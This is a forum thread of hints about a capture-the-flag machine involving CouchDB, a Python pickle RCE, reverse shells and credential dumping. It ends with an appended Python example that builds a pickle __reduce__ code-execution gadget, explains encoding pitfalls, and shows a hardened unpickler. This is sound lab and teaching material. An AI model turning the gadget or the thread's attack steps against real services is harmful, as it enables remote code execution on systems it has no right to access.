@batman786 said:
Is the submit form vulnerable or not?? The 1st parameter checks for a regex name match and the 2nd parameter... tried many injection techniques... can't verify if it's vulnerable or not... any hints pls...))
Enumerate more and then revisit the form. You'll see the light and understand how to check it
Comments
It's CouchDB right... It's kinda hard to exploit....))
Use a very popular tool to enumerate the server again...more thoroughly
@TheSecEng and @dirtychai thanks for the help... found what you were talking about... should have focused more on VulnHub challenges....))
Ah root. Awesome box by @overcast! If you need hints, pm me.
I can't believe it took me so long to get user.txt after initial foothold. I had access to the right place, but overlooked a crucial and glaring repository of information that was staring me in the face! Don't overlook things just because you're looking for an RCE exploit! You might miss something important. Finally got user!
Back at this after a week of taking break. I could recreate the page locally, I can see the history and what seems to be a vulnerable URL. I can get it do the 'correct' thing but I am stuck on that.
Rooted at last:))
Anyone need a hint can PM on every stage
I'm sure I enumerated everything I can find, still stuck on foothold...
Any hint, or anyone I can DM to show what I found?
ARGH! :-)
Can anyone give me a nudge?
I have a working payload... but the pesky character prefix is giving me a pickling headache!
OSWE | OSCP | eCPPTv2
I rarely check private messages, if you do ask for help, show your workings. I don't reply to wall posts.
Nevermind... worked it out... xD
OSWE | OSCP | eCPPTv2
I rarely check private messages, if you do ask for help, show your workings. I don't reply to wall posts.
Anyone PM me for the initial foothold.
OSCP | I'm not a rapper
Eeek... running the flask.. I see the problem with the reverse shell and the normal methods! Back at it tomorrow!
OSWE | OSCP | eCPPTv2
I rarely check private messages, if you do ask for help, show your workings. I don't reply to wall posts.
Out of ideas how to gain a foothold/get a shell - any hints on PM would be appreciated, don't spoon feed me if you do, just a nudge. Google thinks i'm an automated bot for the amount of searches i've done today...
Can't really understand how I'm supposed to get something to run when it can't find imports, can't import by filename and it can't find things to do eval as can't find that either... hopefully that's not a spoiler for someone, it could just be that i'm doing it wrong.
Eyes are burning from the fail.
OSWE | OSCP | eCPPTv2
I rarely check private messages, if you do ask for help, show your workings. I don't reply to wall posts.
Finally.. rooted
Hint to anyone lurking here who is getting odd results when trying to do the business on the requests... read the comments around dos2unix and the python library for sending requests etc... d'oh!
OSWE | OSCP | eCPPTv2
I rarely check private messages, if you do ask for help, show your workings. I don't reply to wall posts.
Hi there, enumerated this machine and found the 2 services. Also tried to find a vuln in the webapp while going for the s****t form. No success trying to attach the C*****B. Could someone please give me a hint via pm?
Hi! I've some problems using python requests to exploit the initial RCE: using the same exploit works locally, but when sending the payload to the server I get error 500.
I've also added the header application/x-www-form-urlencoded to the POST. Do I need to add something as a header?
In exactly the same spot. Would love a nudge on the payload for RCE. Can post and check the result based on the hash. If the *1 string is not found I get a good 200 back with the string; if it is found it's 500 each time, but works locally.
No need to add headers... just make a script to automate all the required jobs.
I should have mentioned this is all being done in the same python script, leaving me to think its something to do with the payload encoding in the post request.
Wowsers that took a while to do, great lab...
If it's encoding, read back through these posts and the mention of dos2unix, would it work with that done? Maybe read it in from a file?
I can't give too much away... but I spent a lot of time struggling at the same point.
OSWE | OSCP | eCPPTv2
I rarely check private messages, if you do ask for help, show your workings. I don't reply to wall posts.
If it works locally, then it will work remotely, but ensure you try all payloads and automate those tasks which are working behind the scenes according to that file (you know which one I'm talking about...).
Rooted, I didn't submit the root or user flag because I feel like I cheated lol.
OSCP | I'm not a rapper
Just got a shell. Any point messing with this dot file? John says no thanks, rockyou. Any hints will save many CPU-cycle kittens.
NVM TOO LATE ALL KITTEH DED NAO
Relax. Take a rest, have a lay down on a type of sofa/chair and see what's running on the box.
OSWE | OSCP | eCPPTv2
I rarely check private messages, if you do ask for help, show your workings. I don't reply to wall posts.
Joking no kitteh ded - got flags already. Loved this box - maybe too easy but 11/10 would pwn again...
Complex.
Very complex box.
I would wait for this box to retire and see how to solve it. This one is tougher than other boxes (along with Silo).
OSCP
I have a love / hate relationship with this box. I love the things I've had to learn to get onto the box (albeit in a rubbish shell with no privs). I hate the constant failure at getting creds out of the DB.
Still, when I eventually get user or root, it will cheer me up...
Note: https://www.nohello.com/
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
So I cracked and came back to this tonight. A bit of time with the DB manpages and I've got usernames and passwords out of the DB. Tomorrow I get the "fun" task of working out where to use them...
Note: https://www.nohello.com/
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.
Can anybody give me a clue about the RCE? I could not succeed in getting it to work. I am getting a bad char error. I think the source of the error is a char, but I could not find a way to bypass it.
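Added example, not code from this thread, from the box or from its author: it shows why a Python pickle payload that "works locally" can fail once it has been copied through a file or a POST request (the dos2unix and encoding problems discussed above, and the import / bad-character errors reported in this thread), and it shows the hardened unpickler that makes a `__reduce__` gadget fail. It assumes only what the thread states (Python, pickle, a form POST); the `Gadget` class, the field name `data` and the harmless `echo pwned` command are constructed for illustration and are not the box's names.

```python
import io
import pickle
import subprocess
import urllib.parse


class Gadget:
    """Constructed payload object: pickle records the tuple returned by
    __reduce__ and calls callable(*args) when the bytes are loaded."""

    def __init__(self, argv):
        self.argv = argv

    def __reduce__(self):
        # check_output is used instead of os.system so the command's output
        # becomes the return value of pickle.loads(), which makes it testable.
        return (subprocess.check_output, (self.argv,))


def build_payload(argv, protocol=0):
    """Serialise the gadget. Protocol 0 is newline-delimited ASCII: easy to
    paste into a form field, and easy to corrupt by line-ending conversion."""
    return pickle.dumps(Gadget(argv), protocol=protocol)


def vulnerable_load(blob):
    """The pattern being exploited: unpickling bytes taken from the client."""
    return pickle.loads(blob)


class NoGlobalsUnpickler(pickle.Unpickler):
    """Hardened variant: refuse every GLOBAL lookup, so a __reduce__ gadget
    cannot resolve subprocess.check_output (or any other callable)."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def hardened_load(blob):
    return NoGlobalsUnpickler(io.BytesIO(blob)).load()


def to_crlf(blob):
    """Simulate a payload saved through a Windows editor (what dos2unix undoes).
    The GLOBAL opcode reads the module name up to '\\n', so the stray '\\r'
    becomes part of the module name and the import fails."""
    return blob.replace(b"\n", b"\r\n")


def form_roundtrip(blob, field="data"):
    """Encode the payload as requests.post(url, data={field: blob}) does
    (application/x-www-form-urlencoded), then decode it as a server would.
    Returns the bytes the server ends up with; for protocol 0 they match."""
    body = urllib.parse.urlencode({field: blob})
    return urllib.parse.parse_qs(body)[field][0].encode()


def describe(loader, blob):
    """Run a loader and report (outcome, detail) without raising."""
    try:
        return ("ok", loader(blob))
    except Exception as exc:
        return ("error", f"{type(exc).__name__}: {exc}")


if __name__ == "__main__":
    payload = build_payload(["echo", "pwned"])
    print(payload)
    print("raw  ->", describe(vulnerable_load, payload))
    print("form ->", describe(vulnerable_load, form_roundtrip(payload)))
    print("crlf ->", describe(vulnerable_load, to_crlf(payload)))
    print("hard ->", describe(hardened_load, payload))
```

The form round trip is lossless, so a well-formed payload survives a plain form POST; the CRLF copy fails with a "No module named" error before any command runs, which is the kind of misleading symptom worth checking before suspecting the server. The `find_class` override is the approach the Python docs describe for restricting unpickling; the real fix for the vulnerable pattern is to never unpickle client-supplied bytes at all.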